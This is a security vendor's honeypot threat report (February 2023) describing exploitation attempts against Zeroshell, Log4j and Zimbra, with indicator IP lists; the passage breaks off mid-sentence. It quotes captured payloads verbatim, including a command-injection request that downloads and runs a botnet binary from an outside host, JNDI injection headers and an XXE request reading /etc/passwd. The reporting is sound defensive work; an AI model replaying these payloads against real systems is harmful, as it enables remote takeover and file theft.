CERTCERT

Our selection of alerts on honeypots: report 4 – february 2023

These past two weeks, international TEHTRIS honeypots got relentlessly hit again by suspected malicious activities. The honeypots located in Southeast America, in South and Northeast Asia Pacific and in Western Europe were the most targeted. Here is an extract of some of the attack attempts that were detected.

Attempts to exploit CVE-2019-12725 on German and Portuguese honeypots

Two malicious IP addresses have been detected by TEHTRIS NTA performing a Zeroshell remote code execution (RCE) inbound attempt. Indeed, some of our European honeypots could have been compromised through the CVE-2019-12725 (CVSSv3 : 9,8).

The US IP 4.71.37[.]46, hosted by AS 3356 LEVEL3, performed several dozen hits on Germany and Portugal. This IP address is known from public databases identifying malicious IP addresses.

The Chinese IP 36.110.214[.]195, hosted by AS 23724 IDC, China Telecommunications Corporation, is unknown from public databases of malicious IP. This IP performed only one hit on a German honeypot.

This specific URL is the downloading action for Zero botnet.

GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0

URL DECODE : “;cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;”

The address IP in pink included in the packet above, likely a C2, is a known Portuguese address for exploiting Zeroshell. It is hosted by AS 47674 Net Solutions – Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA.

Log4j exploit attempts on a Swedish honeypot

One of our Swedish honeypots has been the target of loads of “jndirequests that are known for being used in attempts to exploit Log4j vulnerability on devices.

27 IP addresses performed the following headers – which was the most requested upon others:

['origin: $ {jndi:ldap://:8182/a}', 'x-api-version: $ {jndi:ldap://:8182/a}', 'x-att-deviceid: $ {jndi:ldap://:8182/a}', 'proxy-connection: $ {jndi:ldap://:8182/a}', 'prefer: $ {jndi:ldap://:8182/a}', 'accept: */*', 'upgrade-insecure-requests: $ {jndi:ldap://:8182/a}', 'warning: $ {jndi:ldap://:8182/a}', 'a-im: $ {jndi:ldap://:8182/a}', 'x-request-id: $ {jndi:ldap://:8182/a}', 'from: $ {jndi:ldap://:8182/a}', 'forwarded: $ {jndi:ldap://:8182/a}', 'access-control-request-method: $ {jndi:ldap://:8182/a}', 'dnt: $ {jndi:ldap://:8182/a}', 'cache-control: $ {jndi:ldap://:8182/a}', 'x-uidh: $ {jndi:ldap://:8182/a}', 'authorization: $ {jndi:ldap://:8182/a}', 'accept-encoding: gzip', 'x-wap-profile: $ {jndi:ldap://:8182/a}', 'access-control-request-headers: $ {jndi:ldap://:8182/a}', 'x-forwarded-proto: $ {jndi:ldap://:8182/a}', 'pragma: $ {jndi:ldap://:8182/a}', 'date: $ {jndi:ldap://:8182/a}', 'x-forwarded-host: $ {jndi:ldap://:8182/a}', 'x-correlation-id: $ {jndi:ldap://:8182/a}', 'x-requested-with: $ {jndi:ldap://:8182/a}', 'front-end-https: $ {jndi:ldap://:8182/a}', 'http2-settings: $ {jndi:ldap://:8182/a}', 'x-csrf-token: $ {jndi:ldap://:8182/a}']

Other headers performed look exactly the same except for the port number 8182 that changes in a range from 8180 to 8189.

Here are the top 10 IoCs – all known from public databases identifying malicious IPs:

IPASCountry
93.91.117[.]60AS 47562 Fast Link LtdRU
120.236.74[.]234AS 9808 China Mobile Communications Group Co., Ltd.CN
85.51.217[.]156AS 12479 Orange Espagne SAES
118.41.204[.]72
222.103.98[.]58
AS 4766 Korea TelecomKR
72.132.58[.]237AS 20001 TWC-20001-PACWESTUS
178.140.136[.]178AS 42610 RostelecomRU
223.171.91[.]144AS 17853 LGTELECOMKR
46.170.151[.]34AS 5617 Orange Polska Spolka AkcyjnaPL
147.182.233[.]56AS 14061 DIGITALOCEAN-ASNUS

Attempts to exploit CVE-2019-9621 on European honeypots by a Russian IP

Thanks to TEHTRIS NTA that automatically detects any anomaly in the traffic, we monitored an increase in attempts to exploit CVE-2019-9621 (CVSSv3 : 7,5) impacting Zimbra version inferior to 8.8.11 these past two weeks. Indeed, Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows Server-side request forgery (SSRF) and XML External Entity injection via the ProxyServlet component.

The Russian IP address 152.89.196[.]211 (AS 57523 Chang Way Technologies Co. Limited) performed hundreds of actions against all our TEHTRIS European honeypots during this second half of February. This IP identified as malicious in public databases started to attack our honeypots on the 10th of January.

Here is one example of the requests seen in NTA packet:

POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: xx.x.xxx.xx:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Length: 314 Content-Type: application/xml Accept-Encoding: gzip Connection: close <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover>

The line in pink is an attempt to obtain the file/etc/passwd that notably contains the list of the users of the machine.

Attempts to exploit CVE-2019-16759 & CVE-2020-17496 on an Italian honeypot

Hardworking Bulgarian threat actors?

Masscan, an open-source scanner widely used